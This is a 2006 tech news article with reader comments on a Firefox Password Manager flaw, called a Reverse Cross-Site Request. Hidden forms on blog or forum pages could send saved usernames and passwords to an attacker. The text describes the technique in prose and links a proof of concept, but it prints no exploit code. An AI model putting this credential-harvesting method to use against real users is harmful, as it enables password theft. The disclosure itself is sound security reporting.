Firefox password security hole
p2pnet.net News:- Are you one of those people who lets Firefox save your passwords so you don’t have to type them in again?
That might not be such a good idea, Robert Chapin tells p2pnet.
That’s because he’s found a new security hole in the Mozilla Firefox web browser he’s calling a Reverse Cross-Site Request (RCSR).
The vulnerability exposes saved passwords and could affect anyone visiting a weblog or forum website that allows user-contributed HTML codes to be added, says Chapin, who runs Chapin Information Services.
"RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed," says Chapin on his site.
"The Password Manager component of FireFox can be exploited to send a username and password combination to an attacker’s computer without the user’s knowledge. Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.
"A recent large-scale attack using RCSR targeted MySpace.com users and was first reported by Netcraft 10/27/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password."
A recent large-scale RCSR attack targeting MySpace.com involved fake login forms on the MySpace website inviting users to type in their username and password.
Chapin says worsening the problem is the fact forms can be completely hidden from view.
After saving a website password in Firefox, it’s possible for that password to be transmitted to another website by unwittingly clicking on an invisible image link, he says, adding:
"Mozilla confirmed this as bug number 360493, and said they are already working on a fix for version 2.0.0.1 or 2.0.0.2."
A proof-of-concept demonstration is available here.
Chapin recently reported on a MySpace vulnerability which allowed music files to be downloaded anonymously and identified a gaping hole in Yahoo’s music sales site.
Also See:
MySpace vulnerability – MySpace download hack, October 17, 2006
gaping hole – Yahoo Music Unlimited hack, May 30, 2005
p2pnet newsfeeds for your site.
rss feed: http://p2pnet.net/p2p.rss
Mobile – http://p2pnet.net/index-wml.php
November 22nd, 2006 at 12:33 am
Note: you do not have to click on an image or submit a form from the exploit page for the payload to operate here.
Example: http://sysadminco.com/vuln/
November 22nd, 2006 at 3:41 pm
The exploit didn’t work on my Swiftfox/Ubuntu Edgy configuration, no matter how hard I tried.
November 22nd, 2006 at 3:54 pm
Sorry, It works. I just needed to disable the NoScript extension, the pop-up blocker, and to press “remember” the login data.
November 23rd, 2006 at 1:48 pm
Nothing new we already knew Firefox was insecure:
http://www.FirefoxMyths.com
November 24th, 2006 at 10:26 am
Internet Explorer 7 it has the same bug.
info:
http://mentedigitale.altervista.org/phpBB2/viewtopic.php?t=277&sid=44bd33c86014092acdc45de88a866fbf
Info:
http://www.techtree.com/India/News/IE_7_Less_Vulnerable_than_Firefox_2/551-77396-643.html
By WebDataBank
November 24th, 2006 at 10:27 am
Internet Explorer 7 it has the same bug.
info:
http://mentedigitale.altervista.org/phpBB2/viewtopic.php?t=277&sid=44bd33c86014092acdc45de88a866fbf
Info:
http://www.techtree.com/India/News/IE_7_Less_Vulnerable_than_Firefox_2/551-77396-643.html
By WebDataBank
November 17th, 2007 at 8:43 am
[...] read more | digg story [...]
July 10th, 2008 at 10:10 am
If I were worried about security I wouldn’t want my paswords sitting there in plain text for anyone who sits down at my computer. What a crock. Check this warning out.
http://foxsys.blogspot.com/2008/07/firefox-3-saved-password-security.html
firefox password security